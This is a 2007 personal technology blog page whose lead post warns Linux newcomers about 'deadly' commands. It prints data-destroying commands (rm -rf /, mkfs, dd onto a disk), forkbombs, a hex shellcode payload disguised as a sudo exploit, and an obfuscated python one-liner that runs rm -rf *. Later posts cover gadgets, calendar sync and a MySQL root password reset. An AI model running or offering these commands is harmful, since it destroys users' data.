Friday, November 30, 2007

7 Deadly Sins in Linux



Linux is all about the experience, learning and adventure. Creative ways to solve existing problems, fast hacks and just playing around till you have the complete control. But there are some restrictions.

Here is the Noob's guide to the coolest but deadly commands/programs in linux..



1. Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.

rm -rf /
rm -rf .
rm -rf *


2. Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.

mkfs
mkfs.ext3
mkfs.anything


3. Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:

any_command > /dev/sda
dd if=something of=/dev/sda


4. Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.

In shell:

:(){:|:&};:


In perl
fork while fork


5. Tarbomb & Decompression bombs: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory. You should not touch data from an untrusted source

6. Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:


char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";


To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.

7. Cool Python scripts: Never copy paste scripts into your terminal without knowing what it is. For instance look at this snippet.

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'


Where "sn!.sg!+" is simply rm -rf * shifted a character up


[courtesy: UbuntuForums]

Monday, November 19, 2007

Amazon Kindle available now on Amazon -- free EVDO!


Engadget
Engadget
Engadget
By Thomas Ricker on kindle

It's here and looking just as busted as it did when we broke the Amazon Kindle eBook reader for you last year. $399 (and free 2 day shipping) with access to 88,000 books including 100 of the 112 New York Times best sellers. No WiFi here, Amazon's Whispernet service is FREE and based on Sprint's EVDO: "Amazon pays for Kindle's wireless connectivity so you will never see a monthly wireless bill for shopping the Kindle Store." Whispernet allows Kindle owners to wirelessly shop the Kindle Store, dowload and receive content -- and it works out the box, no setup required. All new release books cost $9.99 as do books found on the NYT best sellers list. Newspaper subscriptions cost $5.99 to $14.99 per month and Kindle Magazines cost between $1.25 and $3.49 per month -- each is available for a free 2 week trial. Oddly, blogs will cost you $0.99 per month to subscribe. All purchased content is stored as a backup on Amazon's site. Running down the specs again: internal storage for 200 titles (more via SD expansion), battery that lasts for days (2 hour recharge), 10.3 ounces, built-in dictionary and Wikipedia, and plenty more. While the reader itself could be mistaken for a Handspring device from the 90s, the service itself certainly makes for a compelling proposition.

Read -- Kindle Store
Read -- Kindle device
Read -- Video demonstration



Amazon Kindle Official Details: the "iPod of Reading" [Official]

By Matt Buchanan on Wireless (Source: Gizomodo)

amazon_kindle_1118.jpgThere's a lot to digest in Newsweek's seven-page all-out feature. Amazon CEO Jeff Bezos sums it up: "This isn't a device, it's a service." Kindle starts shipping tomorrow for $399 and is "a perpetually connected Internet device" running off of EV-DO—it calls the service "Whispernet." It's totally computer independent: You browse for books (88,000 at launch) and buy them in a "one-touch process," it comes with a personal Kindle email address and it can browse the regular internet—keyboard sounds useful now, doesn't it?

New York Times bestsellers and hardback new releases will go for $9.99, with classics going as low as $1.99. Through the service, which is an extension of the Amazon store, you also can subscribe to newspapers (New York Times, Wall Street Journal, Washington Post) and magazines, which are automatically sent to Kindle when they drop on the wire.

Talking about the hardware itself, it'll hold 200 books on board, though you can supplement with unspecified memory cards. It'll get up to 30 hours of reading per charge and weighs 10.3 ounces. So, why does such a potentially disruptive device look so very plain? They wanted it to look like "an austere vessel of culture." The moniker Kindle is from the same line of thinking, " the crackling ignition of knowledge." But, thankfully, it doesn't get warm itself.

Some obvious questions are left though, mostly about the "always-on" connection—is the EV-DO-based Whispernet service included in the $399? If not, what's the pricing on that? And what are its limits, since you can go out onto the real web? Odds are, Bezos himself will reveal the answers tomorrow.

The goals here are pretty lofty: "Amazon believes it has created the iPod of reading." We really, really dig Jeff's vision, "that you should be able to get any book—not just any book in print, but any book that's ever been in print—on this device in less than a minute," so we hope about as much as he does that this little beige slab lives up to all the wonderful that they're promising. [Newsweek]

Source: Gizmodo

Friday, November 16, 2007

Thursday, November 15, 2007

MySql: Access denied for user 'root'@'localhost'

By default, MySql has no root password when installed, hence the following should work in most cases. But in some cases, mysql and mysqladmin simply throw Access denied message and you have no clue how to change the password after that.

$ mysql -u root
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)

Here is an elegant solution for this highly irritating but common problem.


This is how you reset the password.

1. Start the mysql server instance or daemon with the --skip-grant-tables option. (security setting)

$ mysqld --skip-grant-tables

2. Then Execute these statements.

$ mysql -u root mysql
$mysql> UPDATE user SET Password=PASSWORD('my_password') where USER='root';
$mysql> FLUSH PRIVILEGES;

3. Finally, restart the instance/daemon without the --skip-grant-tables option.

$ /etc/init.d/mysql restart

4. You should be able to connect with your new password.

$ mysql -u root -p
Enter password: my_password

courtesy: Shawn Tucker @ MySql Forums

Wednesday, November 14, 2007

Official Nokia N82 press shots!


Straight from the source and about 21 hours early, Engadget's got the 5 megapixel Nokia N82 press shots. No detailed press release but really, what more do you need to know that you don't know already? Ah hell, we'll run down the rumored specs for you one more time: quad-band GSM, 2100MHz HSDPA for Europe, WiFi, GPS, FM Tuner, Bluetooth, 3.5-mm headphone jack, Carl Zeiss lens with Xenon flash, automatic rotating 2.4-inch QVGA display, and microSD expansion.

[source: Engadget ]

Desktop Blogging : ScribeFire for Ubuntu


Bloggers web interface really frustrates me and is not ideal for writing long articles ;). I was also looking for a nice replacement for BloGTk., which had served well even with it's extensive set of limitations and bugs. There are tonnes of other alternatives for linux like the Gnome Blog poster, Drivel Journal editor. You could also use google Docs to directly post on to blogger.
For a list of such apps, visit :

http://beans.seartipy.com/2007/11/12/desktop-blogging-editors-for-gnulinux-users/


Finally I ended up trying ScribeFire. The beauty of firefox addons are that they are cross-platform. This brings some seriously useful functions to linux. For instance, DownThemAll which easily is the best download manager that linux has.


ScribeFire is good, easy to use, has a nice interface with tonnes of features. It even connects to your del.icio.us account and fetches your tags and bookmarks. It has both preview and code panels, a technoarti search and a ftp/html picture upload function (you need to have some hosted web space to do this)

There are some flaws too, which I hope the developers can fix soon. For instance, the wonderful account wizard connected and extracted everything from my blogger account, but the tags weren't imported. The Html view really has some bugs ;) and it still doesn't support the image upload that blogger supports. My guess that the blogger API doesn't allow 3rd party apps to upload images to its servers.
You can use Fireuploader addon, to upload your pics to flickr or picasa and then use the link with ScribeFire. Personally I prefer blogger due to its image upload function.


Anyways, overall a nice app, for those who love to script their blog ;) will love the wide and feature rich tool set of ScribeFire.


Tuesday, November 13, 2007

Android SDK is out !!





Google just released the Android SDK and a 10 million$ developer competition to get the ball rolling for this new platform.

Here are some videos of the new platform..



















Monday, November 12, 2007

Synchronising your calendars with google Calendar



This is a real life problem that many face. You have a calendar in your cell phone for immediate appointments, you use google calendar extensively, for the sms reminder and public event sharing. You also have Sunbird/Thunderbid to manage your local schedules.

Wouldn't it be great if you can synchronize them all at once. Let me show you how easy it is


Step1: Sync Sunbird/Thunderbird with GCalendar


Thunderbird has a nice addon called Lightening, which adds calendar support to Thunderbird. It makes for a killer Sunbird/KDE PIM replacement.
Once you are done installing it,
install the Google Calendar Provider addon.
This gives you bidirectional ability to read and write google calendars

Setting up your remote google calendar on thunderbird/sunbird is very easy. Just go to File > New > Calendar > Network Calendar > Google Calendar
and paste the private html url of your google calendar



Read this graphical tutorial, if you don't know where to find it.

Congrats!. That's it. Once everything is setup, you can read/write your google calendar directly from Thunderbird.




Step2: Sync your phone with GCalendar

There are lots of tools available that help you do this. My personal favorite is GooSync. This allows you to directly sync with your google calendar over the air via internet. Register for a free account and try it. The steps are pretty explanatory.
All you need to do is :
a) select your phone model,
b)give your phone no. so that it can send you the sync settings
c) Select your google id by authorising it to access your calendar
d) Select the calendar (free version allows you to sync only 1 calendar)
e) Wait for the settings sms.
f) Save the settings in your phone and sync.
(note you need an access to the internet on your phone)














viola! Your phone is now in sync with your thunderbird and google Calendar.
No more missed appointments, hassles of unsynchronized calendars and using complex tools (specially in linux) to sync your mobile and your desktop calendar

Saturday, November 10, 2007

It's raining Veronica Belmont this Week!




We remember the lovely Veronica Belmont from her days as an executive editor and producer at CNET
After CNET, she joined Mahalo and has been working there ever since on a video podcast, called Mahalo Daily.

Lately, She's been doing guest appearances in all my favorite podcasts and it is good to see her as exuberant and lively as always. Few weeks back she was on dl.tv. This week she appeared on TWiT, revision3 Tekzilla and Mahalo Daily (finally!)

Here are the vcasts...


Mahalo Daily episode 4





Revision3 Tekzilla episode





Wednesday, November 07, 2007

World class University starts a module on Facebook Applications programming



National University of Singapore, a famous university in SE Asia has started a course on developing Facebook Apps. Cleverly termed as a Software development for evolving platforms, it's open to students from all background - Arts, Science, Computers etc, with absolutely no programming experience needed.

So how many are actually interested in doing this module ?...

digg story



The intial feedback from some of my friends was really surprising. They were actually looking forward to doing it next semester. The ones who graduated are a little upset of not having similar opportunities during their time.

So what exactly is the module about?
It's typically a software engineering course for facebook. Team of students have to design and implement a new application for facebook. Along with the application, a presentation and a business plan might be needed.

Is it heavy?
All SOC (School of Computing) modules are heavy. If people from other backgrounds wish to experience the crunching, painful, laborious life of SOCians, they should take this, as the pre-requisite is highly subsidized as its the first outing of the module, and they want a nice attendance.


Tuesday, November 06, 2007

Hurray! First Anniversary




Hurray! First Anniversary of "My Take on Technology".

Exactly a year back, I posted my first post and it has been a great journey of learning and fun so far. It all started as a hobby to fight boredom during my years at University. Initially with stuffs on tv episodes and gaming, now it focuses on the latest in technology, open source world and Linux. I hope to cover a wider range of topics in the near future.

I thank you all for the support and enthusiasm shown towards my blog.

Introducing Android: The Future of Open Source Mobile Platforms


.


And here is the rest of it.

Site of the Week: Pageflakes





Pageflakes is a NetVibes and iGoogle like personal news and rss aggregator where you can add nifty little widgets, rss feeds and stuff and have all your favorite websites and feeds in 1 page. Here we look at the great things Pageflakes has to offer to increase our productivity.. and hey a gentle warning, it is highly addictive too.





Some cool and useful flakes (widgets) are the gmail mail checker, del.icio.us bookmarkers, rss feed readers etc. Pagelakes allows you to customize the layout, themes etc. You can add more pages, each with different elements say for Biz news, emails, technology news etc.





Pageflakes has tonnes of great features. It has a reader tool similar to google reader/bloglines and all the rss feeds added to your pages are automatically available via it.

Another highly useful feature in Pageflakes is PageCasting, which allows you to share your page with other users. There is a cool flake which allows users to create a community board to share stuffs and collaborate.

You can also chose to add an entire page from other users by copying it or linking(watch) to it allowing you to use completely designed pages in your view, which is highly useful as the community already has some greate pagecasts covering a wide array of services and news.

Overall, a great, attractive and useful tool for people who spend lots of time reading and browsing through blogs and webpages and can access all the information from one page.

Sunday, November 04, 2007

My Desktop Looks better than yours


Compiz is activated by default on Gutsy. To change the settings just go to..

System > Preferences > Appearances > Visual Effects.

If you want the more advanced effects, chose Extra.
This gives you some extra effects like the wobbly windows.

In order to fully configure compiz, you need an additional package called
compizconfig-settings-manager. Get it off synaptics.



Once you have this package installed, you will see a Custom radio button, which gives you tonnes of new fxs. Play around and have fun

Just remember you need a decent graphics card to enjoy all the advanced effects. It does take a toll on your system, but then nothing beats the envy on your friends' faces when they see your cool new desktop ;)